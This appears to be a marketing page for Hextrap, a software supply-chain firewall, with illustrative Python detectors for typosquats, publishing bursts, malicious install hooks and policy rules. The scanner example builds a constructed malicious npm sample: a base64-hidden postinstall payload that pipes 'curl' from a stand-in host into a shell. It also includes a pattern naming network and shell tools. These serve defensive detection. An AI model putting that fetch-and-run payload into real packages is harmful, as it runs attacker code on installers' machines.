The Firewall Your Developers Will Actually Use.
Security tools that create friction get worked around. Hextrap is a transparent proxy — it fits into existing workflows without changing them, giving you visibility and control without a constant battle for adoption.
How Hextrap detects threats
Multiple independent detection layers, running on every install in real time
Typosquat Detection
Real-time: Fuzzy string matching of each requested name against a database of popular packages, using normalized names (case, separators, look-alike characters) and phonetic similarity. Catches requests vs request, numpy vs numyp, lodash vs 1odash, and thousands of documented campaign variants. The match threshold is configurable per firewall.
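To make the matching concrete, here is an added example of the normalized edit-distance layer described above. It is illustrative code written for this page, not Hextrap's implementation: the popular-package list is a constructed sample, the homoglyph table is an assumption, and the phonetic layer is omitted.

```python
import unicodedata

# Constructed sample of a "popular packages" database. A real deployment would
# load the top-N names from each registry; this short list is an assumption.
POPULAR_PACKAGES = ["requests", "numpy", "lodash", "express", "pandas", "urllib3"]

# Digits and symbols attackers substitute because they look like letters.
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s", "7": "t", "|": "l"})


def normalize(name: str) -> str:
    """Canonical form for comparison: Unicode-folded, lowercase, look-alike
    characters mapped to letters, separators (-, _, .) removed."""
    folded = unicodedata.normalize("NFKC", name).lower().translate(HOMOGLYPHS)
    return "".join(c for c in folded if c not in "-_.")


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus adjacent
    transpositions at cost 1, so 'numyp' is one edit away from 'numpy'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,         # deletion
                          d[i][j - 1] + 1,         # insertion
                          d[i - 1][j - 1] + cost)  # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def check_typosquat(name: str, popular=POPULAR_PACKAGES, threshold: int = 1) -> dict:
    """Classify a requested package name against the popular-package list.

    threshold is the largest post-normalization edit distance that still counts
    as a near miss. Names shorter than 5 characters are only matched exactly,
    because distance 1 between short names is mostly noise.
    """
    if name in popular:
        return {"name": name, "verdict": "known", "match": name, "distance": 0,
                "reason": "exact popular name"}
    norm = normalize(name)
    best = None
    for candidate in popular:
        cand_norm = normalize(candidate)
        if norm == cand_norm:
            return {"name": name, "verdict": "typosquat", "match": candidate, "distance": 0,
                    "reason": "homoglyph, case or separator variant of a popular name"}
        if len(norm) < 5:
            continue
        dist = osa_distance(norm, cand_norm)
        if dist <= threshold and (best is None or dist < best[1]):
            best = (candidate, dist)
    if best:
        return {"name": name, "verdict": "typosquat", "match": best[0], "distance": best[1],
                "reason": f"within {best[1]} edit(s) of a popular name"}
    return {"name": name, "verdict": "clean", "match": None, "distance": None,
            "reason": "no near neighbour"}


if __name__ == "__main__":
    for candidate in ("requests", "request", "numyp", "1odash", "flask"):
        print(check_typosquat(candidate))
```

Two things a real deployment needs on top of this: a list of legitimate near-neighbours (some popular names are genuinely one edit apart) that is exempted from the fuzzy pass, and a threshold that scales with name length rather than a single global value.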
Soak Time Quarantine
Proactive: New package versions are held in quarantine for a configurable window (1–30 days) before your team can install them. Campaigns that publish a malicious version and count on installs landing in the hours before the registry or researchers pull it are blunted, because by the time the window closes the version has usually been reported and removed. It is the one control that needs no knowledge of the specific threat, which makes it the strongest answer to genuinely novel packages; the trade-off is that the same window also delays legitimate releases, including security fixes.
Coordinated Burst Detection
Heuristic: Mass simultaneous publishing of packages is a signature of organized campaigns. Lazarus Group, the s1ngularity campaign, and others have published in coordinated bursts to overwhelm manual review queues. Hextrap treats abnormal publishing velocity as a standalone risk signal, independent of what the packages contain.
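An added example of a velocity check of this kind, written for this page rather than taken from Hextrap: it counts distinct packages per publisher account inside a sliding time window over a constructed publish feed (account names, package names and timestamps are invented), and the window size, threshold and allow-list of expected bulk publishers are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def _t(s: str) -> datetime:
    """Parse a constructed ISO-8601 timestamp as UTC."""
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Constructed publish feed: (timestamp, publisher account, package name).
# One maintainer publishes at a normal cadence; one fresh account pushes seven
# look-alike packages in under two minutes.
PUBLISH_EVENTS = [
    (_t("2024-03-01T09:00:00"), "maintainer-a", "libalpha"),
    (_t("2024-03-01T15:30:00"), "maintainer-a", "libbeta"),
    (_t("2024-03-02T10:00:00"), "maintainer-a", "libalpha"),
    (_t("2024-03-02T11:00:00"), "acct-7f3", "react-utils-helper"),
    (_t("2024-03-02T11:00:12"), "acct-7f3", "vue-utils-helper"),
    (_t("2024-03-02T11:00:25"), "acct-7f3", "angular-utils-helper"),
    (_t("2024-03-02T11:00:40"), "acct-7f3", "svelte-utils-helper"),
    (_t("2024-03-02T11:01:03"), "acct-7f3", "next-utils-helper"),
    (_t("2024-03-02T11:01:20"), "acct-7f3", "nuxt-utils-helper"),
    (_t("2024-03-02T11:01:41"), "acct-7f3", "remix-utils-helper"),
]


def detect_bursts(events, window=timedelta(minutes=10), threshold=5,
                  allowlisted_publishers=()):
    """Return one alert per publisher whose count of distinct packages inside
    any sliding window of length `window` reaches `threshold`.

    allowlisted_publishers: accounts whose bursts are expected (monorepo release
    bots publish dozens of packages at once) and must not alert.
    """
    by_publisher = defaultdict(list)
    for ts, publisher, package in sorted(events):
        if publisher not in allowlisted_publishers:
            by_publisher[publisher].append((ts, package))

    alerts = []
    for publisher, evs in by_publisher.items():
        best = None
        left = 0
        for right in range(len(evs)):
            # Shrink the window from the left until it spans at most `window`.
            while evs[right][0] - evs[left][0] > window:
                left += 1
            names = {pkg for _, pkg in evs[left:right + 1]}
            if len(names) >= threshold and (best is None or len(names) > len(best["packages"])):
                best = {"publisher": publisher,
                        "window_start": evs[left][0].isoformat(),
                        "window_end": evs[right][0].isoformat(),
                        "packages": sorted(names)}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_bursts(PUBLISH_EVENTS):
        print(alert["publisher"], len(alert["packages"]), "packages between",
              alert["window_start"], "and", alert["window_end"])
```

Velocity alone is noisy: a legitimate monorepo release looks exactly like this, so in practice the signal is combined with account age and name similarity across the burst, or the known bulk publishers are exempted as the allow-list parameter shows.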
Malicious Install Hooks
Behavioral: Packages that run code at install time (a setup.py that pip executes, npm preinstall/install/postinstall scripts) are flagged and analyzed. Outbound network connections, file system access, and shell invocations from an install script are strong indicators of malicious intent. Legitimate packages that fetch prebuilt binaries at install time trip the same checks, which is why a hit is analyzed rather than treated as a verdict on its own.
Obfuscation Detection
Static analysis: Base64-encoded payloads, deeply nested eval() chains, and similar obfuscation are common in supply chain malware built to evade signature-based scanners. Hextrap scores structural obfuscation as a risk signal in its own right, independent of any known signature.
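The following added example ties the two preceding detections together: a static scan of an npm package that flags lifecycle hooks, shell or network commands in them, nested eval() chains, and base64 blobs that decode to code touching dangerous APIs. It is illustrative code for this page, not Hextrap's scanner; the rule set, the risk weights and the two sample packages (one suspicious, one benign, both invented) are assumptions, and example.invalid is a reserved domain that never resolves.

```python
import base64
import re

# Lifecycle scripts that npm runs automatically during `npm install`.
# Assumption: this scanner targets npm; a PyPI scanner would inspect setup.py.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Commands in a hook that reach the network or spawn a shell.
RISKY_COMMAND = re.compile(r"\b(curl|wget|nc|ncat|bash|sh|powershell|cmd\.exe)\b")
NODE_FILE = re.compile(r"\bnode\s+([\w./-]+\.js)\b")
# 40+ base64 characters is long enough to carry code rather than a checksum.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# eval(...)/Function(...) whose argument is itself produced by eval/Function/atob.
NESTED_EVAL = re.compile(r"\b(?:eval|Function)\s*\([^;]*?\b(?:eval|Function|atob)\s*\(")
DANGEROUS_APIS = ("child_process", "require('net')", "require('http')",
                  "require('https')", "process.env")

# Risk weights and verdict thresholds are assumptions of this example.
WEIGHTS = {"install_hook": 10, "hook:network_or_shell": 30, "hook:dangerous_api": 30,
           "obfuscation:nested_eval": 25, "obfuscation:base64_payload": 25,
           "payload:dangerous_api": 40}


def decode_base64_text(blob: str):
    """Decode a blob and return it only if it is printable text (likely code)."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\n\t" for c in text) else None


def scan_script(source: str) -> list:
    """Static checks on a JavaScript file referenced from an install hook."""
    findings = []
    nested = NESTED_EVAL.search(source)
    if nested:
        findings.append(("obfuscation:nested_eval", nested.group(0)))
    for api in DANGEROUS_APIS:
        if api in source:
            findings.append(("hook:dangerous_api", api))
    for blob in BASE64_BLOB.findall(source):
        decoded = decode_base64_text(blob)
        if decoded is None:
            continue
        findings.append(("obfuscation:base64_payload", decoded[:60]))
        for api in DANGEROUS_APIS:
            if api in decoded:
                findings.append(("payload:dangerous_api", api))
    return findings


def scan_package(manifest: dict, files: dict) -> dict:
    """Score a package from its package.json and the source files it ships."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append(("install_hook", f"{hook}: {cmd}"))
        if RISKY_COMMAND.search(cmd):
            findings.append(("hook:network_or_shell", cmd))
        m = NODE_FILE.search(cmd)
        if m and m.group(1) in files:
            findings.extend(scan_script(files[m.group(1)]))
    score = sum(WEIGHTS.get(rule, 0) for rule, _ in findings)
    verdict = "block" if score >= 50 else "review" if score >= 20 else "allow"
    return {"name": manifest.get("name"), "score": score, "verdict": verdict,
            "findings": findings}


# Constructed suspicious sample: a postinstall hook that decodes and evals a
# hidden payload. Package name, version and payload are invented.
_PAYLOAD = "require('child_process').exec('curl http://example.invalid/s | sh')"
_BLOB = base64.b64encode(_PAYLOAD.encode()).decode()
SUSPICIOUS_MANIFEST = {"name": "colorz-utils", "version": "1.0.2",
                       "scripts": {"postinstall": "node setup.js", "test": "jest"}}
SUSPICIOUS_FILES = {"setup.js": f'const p = Buffer.from("{_BLOB}", "base64").toString();\n'
                                'eval(eval(p));\n'}

# Constructed benign sample: no lifecycle hooks at all.
BENIGN_MANIFEST = {"name": "tiny-pad", "version": "2.0.0",
                   "scripts": {"test": "node test.js"}}

if __name__ == "__main__":
    for manifest, files in ((SUSPICIOUS_MANIFEST, SUSPICIOUS_FILES), (BENIGN_MANIFEST, {})):
        result = scan_package(manifest, files)
        print(result["name"], result["verdict"], result["score"])
        for rule, detail in result["findings"]:
            print("  ", rule, "->", detail)
```

The weights illustrate the point made above: a hook by itself only earns a review, a hook that shells out to the network earns a closer look, and the combination of a hook, nested eval and a decoded payload that spawns processes crosses the block line without any signature for the specific payload.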
Dependency Confusion
Policy: A malicious public package is published under the same name as an internal private package, and a package manager that consults both registries resolves the public copy, typically because it carries a higher version number. Hextrap's allow/deny list controls let you explicitly reserve your private namespace so those names never resolve from the public registry.
Granular policy controls — without a policy language.
Security controls are only as good as the team's ability to configure and maintain them. Hextrap's controls are designed to be legible to developers and enforceable without ongoing tuning.
Allow list
Define exactly which packages are permitted. Anything not on the list is blocked. Best for teams with mature dependency management who want full control.
Deny list
Block specific known-bad packages, domains, or name patterns. Everything else passes through. Lower friction, good starting point for most teams.
Soak window
Quarantine all packages published within the last N days (1–30). Set-and-forget protection against zero-day campaign windows without any per-package decisions.
Abandoned package block
Block packages with no releases in a configurable period. Abandoned packages are high-value takeover targets, and blocking them removes the vector entirely.
Audit log
Every install attempt is logged with package, version, actor, policy result, and reason.
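As an added example covering the four controls above plus the private-namespace protection from the Dependency Confusion section, here is a policy evaluator that runs those checks in a fixed order over an install request and emits the audit record described above. It is illustrative code for this page, not Hextrap's policy engine or its log format; the check order, field names, registry URLs, package versions and the example scenario are all assumptions (registry.npmjs.org appears only as the well-known public registry).

```python
import json
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from fnmatch import fnmatch


@dataclass(frozen=True)
class Policy:
    mode: str = "deny"              # "allow": only allow_list passes; "deny": all but deny_list passes
    allow_list: tuple = ()
    deny_list: tuple = ()           # exact names or glob patterns
    soak_days: int = 0              # quarantine versions younger than this; 0 = off, page range is 1-30
    stale_days: int = 0             # block packages with no release within this many days; 0 = off
    private_patterns: tuple = ()    # names that may only resolve from private_registry
    private_registry: str = ""

    def __post_init__(self):
        if self.mode not in ("allow", "deny"):
            raise ValueError("mode must be 'allow' or 'deny'")
        if not 0 <= self.soak_days <= 30:
            raise ValueError("soak_days must be between 0 and 30")


@dataclass(frozen=True)
class InstallRequest:
    package: str
    version: str
    published_at: datetime        # when this exact version was published
    latest_release_at: datetime   # most recent release of the package, any version
    registry: str                 # registry the resolution came from
    actor: str                    # developer or CI identity making the request


def _matches(name: str, patterns) -> bool:
    return any(fnmatch(name, p) for p in patterns)


def evaluate(req: InstallRequest, policy: Policy, now: datetime) -> dict:
    """Run the checks in order and return the audit record for the attempt."""
    result, reason = "allow", "no policy rule matched"
    if _matches(req.package, policy.private_patterns) and req.registry != policy.private_registry:
        result, reason = "block", f"dependency confusion: private name resolved from {req.registry}"
    elif _matches(req.package, policy.deny_list):
        result, reason = "block", "package matches deny list"
    elif policy.mode == "allow" and not _matches(req.package, policy.allow_list):
        result, reason = "block", "package not on allow list"
    elif policy.soak_days and now - req.published_at < timedelta(days=policy.soak_days):
        age = (now - req.published_at).days
        result, reason = "quarantine", f"version published {age} day(s) ago, soak window is {policy.soak_days} days"
    elif policy.stale_days and now - req.latest_release_at > timedelta(days=policy.stale_days):
        result, reason = "block", f"no release in {policy.stale_days} days, abandoned-package takeover risk"
    return {"timestamp": now.isoformat(), "package": req.package, "version": req.version,
            "actor": req.actor, "registry": req.registry, "result": result, "reason": reason}


def audit_log(requests, policy: Policy, now: datetime) -> list:
    """One JSON line per install attempt, the shape a SIEM would ingest."""
    return [json.dumps(evaluate(r, policy, now)) for r in requests]


# Constructed scenario: a deny-mode policy with a 7-day soak window, a 2-year
# staleness limit and a reserved @acme/ namespace. Versions are invented.
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
PUBLIC, PRIVATE = "https://registry.npmjs.org", "https://npm.example.internal"


def days_ago(n: int) -> datetime:
    return NOW - timedelta(days=n)


POLICY = Policy(mode="deny", deny_list=("evil-*", "known-bad-pkg"), soak_days=7,
                stale_days=730, private_patterns=("@acme/*",), private_registry=PRIVATE)

REQUESTS = [
    InstallRequest("@acme/auth-client", "9.9.9", days_ago(1), days_ago(1), PUBLIC, "dev:alice"),
    InstallRequest("@acme/auth-client", "2.4.0", days_ago(30), days_ago(30), PRIVATE, "dev:alice"),
    InstallRequest("lodash", "4.17.0", days_ago(2), days_ago(2), PUBLIC, "ci:build-runner"),
    InstallRequest("evil-utils", "1.0.0", days_ago(90), days_ago(90), PUBLIC, "dev:bob"),
    InstallRequest("left-pad", "1.0.0", days_ago(2500), days_ago(2500), PUBLIC, "dev:bob"),
    InstallRequest("express", "4.0.0", days_ago(60), days_ago(60), PUBLIC, "ci:build-runner"),
]

if __name__ == "__main__":
    for line in audit_log(REQUESTS, POLICY, NOW):
        print(line)
```

The ordering matters: the namespace and deny checks come first so that a shadowed private name is reported as dependency confusion rather than as a soak-window quarantine, and the soak check runs before the staleness check because a brand-new version is by definition not stale.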
Fits into your security stack.
Hextrap doesn't replace your existing tools — it fills the gap they can't cover.
REST API
Full API access for querying activity logs, managing allow/deny lists programmatically, and integrating with SIEM or ticketing workflows.
Webhook Notifications
Push install events to Slack, PagerDuty, or any HTTP endpoint. Get alerted in real time when a block occurs or a new threat pattern is detected.
CI/CD Integration
Service credentials for CI runners separate from developer credentials. Different policy profiles per environment if needed. Pipeline installs are fully audited.
SSO / OIDC
Integrate with Okta, Azure AD, Google Workspace, or any OIDC provider. User provisioning and deprovisioning ties into your existing identity lifecycle.
Deploy in a day. Report results by the end of the week.
No POC project, no migration, no professional services. Talk to us if you want a technical walkthrough.